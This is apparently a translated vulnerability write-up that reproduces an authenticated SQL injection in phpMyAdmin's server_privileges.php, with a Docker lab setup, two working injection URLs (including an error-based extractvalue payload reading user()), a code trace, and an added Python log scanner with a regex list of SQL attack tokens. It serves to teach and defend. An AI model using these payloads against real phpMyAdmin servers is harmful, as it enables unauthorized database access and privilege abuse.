
How to inject SQL into phpMyAdmin background

2025-01-16 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/02 Report

Many people do not know how to carry out SQL injection in the phpMyAdmin back end, so this article summarizes the cause of the problem and its solution; I hope it helps you understand and fix the issue.

0x01 About

phpMyAdmin is a PHP-based database management tool deployed on the web server host that lets administrators manage MySQL databases through a web interface. Through this interface, complex SQL can be entered in a simpler way, which is especially convenient for importing and exporting large amounts of data.

0x02 Vulnerability overview

A user-controllable variable is spliced directly, without filtering, into a SQL statement executed by the user-management interface. This allows a low-privileged user to exceed their authority and execute SQL statements.

0x03 Affected versions

Premise: a valid username and password are known.

phpMyAdmin 4 < 4.9.4
phpMyAdmin 5 < 5.0.1

0x04 Environment setup

Online environment: forward this article to your WeChat Moments and send a screenshot to the public account.

Build it yourself: this reproduction uses phpMyAdmin 4.5.0, set up with Docker.

git clone https://github.com/Paper-Pen/TLSHUB.git
cd TLSHUB/phpAdmin/
docker-compose up -d
docker ps

Visit the page http://xx.xx.xx.xx:8001

The database account is root with password li9hu. The environment is now set up, and you can begin reproducing the vulnerability.

0x05 Vulnerability reproduction

Summary of the process: the vulnerable page is server_privileges.php; set the variable ajax_request to true; set the variable validate_username to a true value; set the variable username to the injection statement spliced onto the expected value.

Construct payload: http://192.168.209.139:8001/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

(The token and other parameters are supplied automatically when you visit the page.) Looking at the data received by the backend, we can see that the SQL statement has been spliced together successfully.

After execution, the program only reports whether the SQL statement succeeded; a failure returns an error message, so error-based injection can be used here.

Construct payload: http://192.168.209.139:8001/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

From the result you can see that the statement we injected was executed successfully.

0x06 Vulnerability analysis

The injection point is in the file libraries/server_privileges.lib.php. Both username and validate_username are user-controllable. We trace backwards to locate the function that contains this if statement.

You can see that the if statement is inside the PMA_getExtraDataForAjaxBehavior function. The next step is to navigate to the point where this function is called, using the PhpStorm shortcut Ctrl+B.

Jumping to the file server_privileges.php, we see that $extra_data triggers this function, and the call sits inside an if statement. Next, use Ctrl+Shift+F to search globally for the variable is_ajax_request and check whether it can be controlled to be true.

Jumping to the file libraries/common.inc.php, there is a controllable variable ajax_request; as long as it is set to true, is_ajax_request evaluates to true.
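For defenders, the request shape described in 0x05 and 0x06 (server_privileges.php with validate_username set and SQL metacharacters in username) is easy to pick out of web-server access logs. The following is an added example, not code from the original article or from phpMyAdmin; the log lines and IP addresses are constructed, and the suspicious-token list is a heuristic assumption.

```python
# Added example: flag phpMyAdmin access-log lines whose request matches the
# validate_username / username pattern described above. Log lines are constructed.
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in common access-log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jan/2025:10:00:01 +0000] "GET /server_privileges.php?ajax_request=true&validate_username=1&username=alice&db=&viewing_mode=server HTTP/1.1" 200 512
10.0.0.9 - - [16/Jan/2025:10:00:07 +0000] "GET /server_privileges.php?ajax_request=true&validate_username=1&username=1%27or%201=1%20--+&db=&viewing_mode=server HTTP/1.1" 200 734
10.0.0.9 - - [16/Jan/2025:10:00:09 +0000] "GET /server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+&db=&viewing_mode=server HTTP/1.1" 200 801
10.0.0.7 - - [16/Jan/2025:10:01:00 +0000] "GET /index.php?route=/sql HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)'
)
# Heuristic (assumed): tokens that have no place in a legitimate MySQL account name.
SUSPICIOUS = re.compile(
    r'''['"#]|--|/\*|\(|\bextractvalue\b|\bupdatexml\b|\bselect\b|\bunion\b''', re.IGNORECASE
)

def is_suspicious_request(url: str) -> bool:
    """True when a request hits server_privileges.php with the validate_username
    branch enabled and a username value that looks like SQL rather than a name."""
    parts = urlsplit(url)
    if not parts.path.endswith("/server_privileges.php"):
        return False
    q = parse_qs(parts.query, keep_blank_values=True)  # decodes %27 and '+'
    if "validate_username" not in q:
        return False
    return any(SUSPICIOUS.search(name) for name in q.get("username", []))

def scan_log(text: str) -> list:
    """Parse each access-log line and return the ones worth alerting on."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_suspicious_request(m["url"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "url": m["url"]})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"ALERT {hit['ts']} {hit['ip']} {hit['url']}")
```

Run against the constructed sample, the scanner flags the two requests from 10.0.0.9 and ignores the ordinary username lookup and the unrelated page.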

0x07 Fix

Update to the latest official patch.

After reading the above, have you understood how SQL injection in the phpMyAdmin back end works? If you want to learn more techniques or learn more about this topic, you are welcome to follow the industry information channel. Thank you for reading!
